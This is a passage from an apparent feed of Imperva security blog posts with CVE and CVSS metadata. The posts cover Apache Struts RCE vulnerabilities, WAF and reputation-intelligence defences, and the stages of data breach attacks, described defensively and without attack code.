ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. 
The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. 
We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>). However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers\u2019 tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. 
Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>) (WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that login credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). 
Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fool\u2019s gold.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. 
Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enables our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk than Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means fewer apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. 
Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. 
Given that web apps frequently access back-end data stores, the potential for an RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d_ In layman\u2019s terms, this means applying the patch can break an existing app. 
This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note: not all types of security gateways can apply a virtual patch to all types of vulnerabilities._\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe for Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. 
There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine whether the request comes from a human or a bot and, if a bot, whether it is a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask themselves, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability the attacker in every case needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. 
The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses that understanding to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, it\u2019s more cost-effective for them to just broadly launch an attack than it is to first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it as an \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them both as an early indicator and to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by itself isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t._ 
The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost-effectively leverage their effort across thousands of websites.\n\nBusinesses will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. 
Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-14T03:35:02", "description": "[Reputation intelligence](<https://www.imperva.com/app-security/threat-intelligence-101/reputation-intelligence/>) is information about cyber entities known for specific activity, whether malicious or benign, which 
can be fed to and actioned on by a web application firewall (WAF). It provides an additional application security layer by effectively identifying and blocking threats from known malicious sources. Using reputation intelligence, large amounts of traffic can be classified as malicious or benign, reducing the workload of WAFs to inspect the actual content of that traffic. You can better understand where traffic originates, who is creating it and the potential risk.\n\nWith up-to-date information on all known cyber entities delivered to your [WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>), reputation intelligence can help block an attack or allow legitimate traffic, which in turn significantly reduces false positives.\n\nExamples of reputation intelligence entities include:\n\n * **Malicious IP Addresses**: Sources that have repeatedly attacked other websites\n * **Anonymous Proxies**: Proxy servers used by attackers to hide their true location\n * **TOR Networks**: Anonymous communication software used by hackers to disguise the source of an attack\n * **IP Geo-location**: Geographic location from which attacks are initiated\n * **Phishing URLs**: Fraudulent sites (URLs) that are used in phishing attacks\n * **Comment Spammers**: IP addresses of known active comment spammers\n * **Remote File Include (RFI)**: URLs that were identified as locations from where malicious files are downloaded\n * **SQL Injection IPs**: IP addresses that were identified as serial SQL injection attackers\n * **Scanner IPs**: IP addresses that were identified as serial scanner attackers\n * **Spamdexing**: URLs used in comment spam attacks\n\n## Benefits of Reputation Intelligence\n\nPeople often ask us why they should add reputation intelligence to their WAF. 
One of our large global customers summed it up best: \u201cReputation intelligence is the low-hanging fruit, we just block based on the feeds delivered to the WAF and see immediate value \u2013 I\u2019m blocking the bad guys without creating new security rules.\u201d This is the fundamental benefit delivered by reputation intelligence \u2013 automated blocking of threats based on specific entities, such as IPs or URLs.\n\nThere are additional benefits to adding reputation intelligence to your WAF, such as gaining geo-location information to reduce false positives and to establish and enforce business policies. For example, many enterprises have geo-location restrictions. Some media entertainment companies such as Netflix provide service to their customers in the US only, and they could use a geo-location feature to enforce that policy.\n\nReputation intelligence is also used to minimize false positives generated by a WAF by providing whitelist resources:\n\n * CDN IP addresses\n * Legitimate search engines\n * Well-known \u201cgood\u201d (non-malicious) entities\n\nA WAF can use this intelligence to exclude certain entities from strict policies. For example, if you want to block scanning attempts based on the resource polling frequency from servers, you can do so while still allowing legitimate search engine indexing traffic, avoiding false positives.\n\nReputation intelligence also enables a WAF to enforce other business-oriented policies. For example, some enterprises want to allow users from certain countries who browse through anonymized proxies to access their website. On the other hand, attackers frequently use automated tools behind anonymized proxies to attack web applications. A WAF with reputation intelligence can set a granular policy to block automated tools that hide behind anonymous proxies and TOR networks while allowing legitimate human traffic.\n\nApart from delivering feeds on cyber entities, reputation intelligence is also used to mitigate zero-day attacks. 
After the latest Apache Struts remote code execution vulnerability was released ([CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)), Imperva used its reputation intelligence service to push the mitigation for it to SecureSphere WAF customers in a matter of hours, providing them with zero-day protection.\n\n## Measuring the Quality of Reputation Intelligence\n\nVarious vendors offer reputation intelligence services, so how do you know which one is best? Great question, difficult answer. If there are a lot of false positives, that\u2019s an obvious indicator that the reputation intelligence feed is not high quality and you don\u2019t want to use it. But there are several parameters to consider. Here\u2019s what to look for:\n\n * **Size of feed** \u2013 The number of entries in the feed will vary by the content\u2014from a few hundred to a few thousand\u2014but they should represent the real-world landscape of good and bad cyber entities that extend beyond IP addresses to include phishing sites, TOR networks, and proxies. For example, you might expect a feed of dedicated phishing sites to contain a few dozen active sites, malicious SQL injection IPs to contain a few hundred, and IP comment spam as much as 50,000 IPs.\n * **False-positive and true-positive rates** \u2013 These reflect the accuracy of the feed. Lower false-positive rates and higher true-positive rates indicate better feed quality.\n * **Geographic diversity** \u2013 In cases where a company\u2019s business is open to the entire world, you will want reputation feeds that cover all parts of the world and aren't limited to a specific geo-location, such as US traffic only.\n * **Reputation intelligence updates** \u2013 Most malicious entities are constantly changing. IPs on the world wide web are dynamically allocated to users. 
For example, the majority of phishing sites remain active for [only four to eight hours](<https://www.darkreading.com/threat-intelligence/14-million-new-phishing-sites-launched-each-month/d/d-id/1329955>). Therefore, the frequency with which the feeds are updated is important.\n\nYou need to be sure that a vendor\u2019s coverage of the web is wide enough. Vendors that see many gigabits of traffic per day across different regions around the world will have more visibility to provide more accurate coverage. This will dramatically increase the size of the feed and the true-positive rate, reduce the number of false positives and provide higher diversity of resources.\n\n## You Have Reputation Intelligence, Now What?\n\nOnce you have reputation intelligence delivered via an automated feed to your WAF, you can take the following actions:\n\n * **Block threats** \u2013 With high-quality reputation intelligence feeds you will see a low-to-zero false-positive rate and can begin using the WAF in blocking mode.\n * **Perform forensics** \u2013 Gather reputation-based traffic in your estate and use it to correlate with other security devices for forensics and incident response.\n * **Build compound policies** \u2013 Use the reputation intelligence feeds to create more robust security policies. 
For example, IP comment spam resource feeds can be combined with the behavior characteristics of publishing a comment on a web site (such as POST HTTP method and a parameter with a URL).\n\nIn summary, reputation intelligence improves your application security posture, reduces false positives, increases accuracy and mitigates zero day threats.\n\nLearn more about Imperva [reputation intelligence services](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) or [request a demo](<https://www.imperva.com/Resources/RequestDemo?src=WWW:RequestDemo:US:product-banner:demopage>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-13T16:30:38", "type": "impervablog", "title": "How Reputation Intelligence Improves Application Security", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2017-11-13T16:30:38", "href": "https://www.imperva.com/blog/2017/11/how-reputation-intelligence-improves-application-security/", "id": "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 
"2022-09-12T15:28:21", "description": "## Key signs to look for in today\u2019s complex data threat landscape\n\n## Introduction\n\nThe most vulnerable data repositories are the ones deep in your organization\u2019s infrastructure. Everyone assumes they are safe, but as with your home, organizations must invest in security at entry points. Otherwise, the result is unsecured valuables lying around out in the open or easy to find in obvious closets or drawers.\n\nWhat happens to security when someone known to the homeowners, like a plumber, gardener, or friend, has access to the house? It becomes much easier for other people to exploit the homeowner and access the property.\n\nThe same principle applies to organizations. They deploy most of their security strategy on the perimeter and leave their \u201cdeep\u201d data repositories vulnerable to data breaches. Bad actors have the opportunity to exploit organization insiders or third-party software components. A [2022 Forrester report](<https://www.imperva.com/resources/resource-library/white-papers/forrester-insider-threats-drive-data-protection-improvements-full-report/>) revealed that 58 percent of sensitive data incidents are caused by insiders, either from non-malicious mistakes or deliberately malicious actions. The report also revealed that 82 percent of organizations do not have an insider risk management strategy or policy. It doesn\u2019t, however, have to be this way.\n\nYour data repositories contain the sensitive personal data of your business, employees, and customers, and, much like the valuables around your home, you should have a security strategy to safeguard them effectively. Staying with the home security metaphor, you need to consider turning the containers of your valuables into secure vessels, minimizing the number of people who could gain access, and gaining the ability to inventory losses when they happen. 
In data security, this means encryption, minimal entitlements, access control, and advanced analytics. Forrester data suggests, however, that not all organizations understand how to create an effective data security strategy, and their biggest mistake is not effectively addressing the insider threat.\n\nTwo critical business trends contribute to the ease with which bad actors can sneak undetected into your organization's infrastructure and breach sensitive data, and we address them in this post. Next, we\u2019ll explain general data breach attack flows and profile typical attackers to help you gain a better understanding of who and what to look for. Finally, we\u2019ll make some recommendations on how you can integrate a modern data security fabric with existing tools to create an effective, sustainable data security strategy.\n\nThe cost of an intruder who has access to the \u201chouse\u201d on an ongoing basis cannot be overstated. Every day, bad actors can exploit your vulnerable data repositories and your structured, semi-structured, and unstructured data to exfiltrate the sensitive information for which you are responsible. A compromised repository can easily play a role in the data exfiltration process by acting as temporary storage or a proxy to transport the data from a secure environment to an unprotected environment and then to the outside. This is the essence of a data breach - a successful attempt to open the closet or \u201ccrack\u201d the safe and expose the sensitive personal data contained in it.\n\n## Two business trends make organizations vulnerable\n\n 1. **The need to integrate with external technology providers.** Some CISOs and their team members struggle to secure a business services environment, which becomes additionally challenging as business operations agility grows.\n 2. 
**The evolution of cloud computing.** As organizations transition to the cloud, they are using third-party cloud-managed computing environments and third-party SaaS services to accelerate the migration process.\n\n## Data breaches are far more common today because of third parties\n\nRelying on third-party code and service providers means that an organization's information technology infrastructure is exposed to suppliers that do not have a robust data security strategy aligned with the organization\u2019s own. The risk becomes much greater as every third-party technology provider's security vulnerabilities, in effect, become yours.\n\nThe first step for CISOs and their security teams is to secure all sensitive data assets and gain complete visibility into all data repositories that are part of the organization's architecture. This includes legacy repositories deep in the architecture and new ones, in on-premises and cloud-managed environments, and even data repositories that you don\u2019t know exist yet. When you have that level of visibility, you can evaluate vulnerabilities, figure out who should have privileged access to the repositories and why, and then optimize your detection and response process to deal with potential breaches.\n\n## General data breach attack flows\n\nMost data breaches have common characteristics, no matter the details of the breach. 
First, the attacker needs to penetrate the organization's IT (Information Technology) or OT (Operational Technology) environments, look around and find the asset of interest that they can take.\n\n### Examples of Early Signs of a Data Breach\n\n**Signs in critical stages:**\n\n**Reconnaissance:**\n\n * System tables scan\n * Massive database scan\n * Multiple login attempts\n\n**Exploitation:**\n\n * Open command shell\n * Machine takeover\n\n**Data Access:**\n\n * Service account misuse\n * Retrieving high numbers of records\n * Accessing business-critical data\n\n**General Signs:**\n\n * Work/activity in unusual hours\n * Use of dynamic SQL\n\n## Data breach attacker types\n\n### Hit & Run\n\nThis \u201cOpportunist\u201d identifies an opportunity, whether it is a vulnerability, a publicly open database, or something else. The bad actor decides to take what they can and leave. This kind of attacker will not try to search for other databases or penetrate the organization\u2019s network, or try to execute exotic exploits, etc. They will just take what they can, and then sell it to the highest bidder.\n\n### The Curious\n\nThis attacker usually sets out with a purpose, but may decide to look deeper. They may look around a little bit, but not too much. They are still focused on their original purpose: malware deployment, data exfiltration, etc.\n\n### The Resident\n\nThe most dangerous type. As in the Equifax breach, the Resident gains access to the organization\u2019s network and stays for months, sometimes years. They use keyloggers, sniffers, and other methods to steal credentials and compromise databases, using \u201c[Low and Slow](<https://www.imperva.com/blog/the-account-takeover-threat-a-by-the-numbers-breakdown/>)\u201d and other methods to stay undetected.\n\n## Common data breach attack examples\n\nThe attacks that cause the greatest damage are \u201cResident\u201d attacks. 
Let's consider some examples to understand how these attacks are forged.\n\n### The resident attack\n\nInfosec disasters are typically the result of multiple failures. Invariably, post-breach analysis reveals several security weaknesses that allowed attackers to steal terabytes of information from supposedly secure systems.\n\nThere are several well-known, high-impact incident reports, such as Equifax, Anthem Inc., and the U.S. Office of Personnel Management, that describe pre-breach progressions falling under this category.\n\n### Typical attack flow\n\n 1. The initial hack is done via a web-facing application, one example being the Equifax customer complaint portal and its CVE-2017-5638 vulnerability. **ThreatPost:** _\u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.\u201d_\n 2. Attackers exploit weaknesses in the company's security posture, notably the lack of proper segmentation.\n 3. In almost all major breaches, a lack of continuous security patching of servers and databases contributes to the attack\u2019s success.\n 4. Unpatched servers and databases provide the resident attacker room to operate freely within the company's network for a protracted period of time.\n 5. In almost all these attacks, the intruders were in the company\u2019s environment for months, customizing their attack tools over and over again until the sensitive data was successfully compromised.\n\n### Ransomware attack\n\nThis type of attack is designed to disable critical systems or prevent sensitive data access by privileged users until a specified amount of money is paid. Ransomware attacks have become more and more sophisticated. They typically involve:\n\n1\\. 
